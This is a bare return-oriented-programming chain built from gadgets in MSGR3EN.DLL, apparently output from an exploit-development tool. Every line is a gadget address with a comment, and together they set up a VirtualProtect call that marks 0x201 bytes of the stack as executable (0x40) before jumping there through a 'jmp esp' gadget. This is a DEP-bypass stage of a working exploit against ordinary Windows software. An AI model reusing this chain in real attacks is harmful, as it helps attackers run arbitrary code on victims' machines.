===[MSGR3EN.DLL]===

0x3f395362,  # POP ECX # RETN [MSGR3EN.DLL] 
0x3f101088,  # ptr to &VirtualProtect() [IAT MSGR3EN.DLL]
0x3f383862,  # MOV EAX,DWORD PTR DS:[ECX] # RETN [MSGR3EN.DLL] 
0x3f2f184b,  # XCHG EAX,ESI # POP EAX # RETN [MSGR3EN.DLL] 
0x41414141,  # Filler (compensate)
0x3f395dee,  # POP EBP # RETN [MSGR3EN.DLL] 
0x3f37d26c,  # & jmp esp [MSGR3EN.DLL]
0x3f1e4adc,  # POP EBX # RETN [MSGR3EN.DLL] 
0x00000201,  # 0x00000201-> ebx
0x3f39b067,  # POP EDX # RETN [MSGR3EN.DLL] 
0x00000040,  # 0x00000040-> edx
0x3f395362,  # POP ECX # RETN [MSGR3EN.DLL] 
0x3f3a2708,  # &Writable location [MSGR3EN.DLL]
0x3f2d6cdc,  # POP EDI # RETN [MSGR3EN.DLL] 
0x3f390cc2,  # RETN (ROP NOP) [MSGR3EN.DLL]
0x3f396611,  # POP EAX # RETN [MSGR3EN.DLL] 
0x90909090,  # nop
0x3f2f92f4,  # PUSHAD # RETN [MSGR3EN.DLL] 
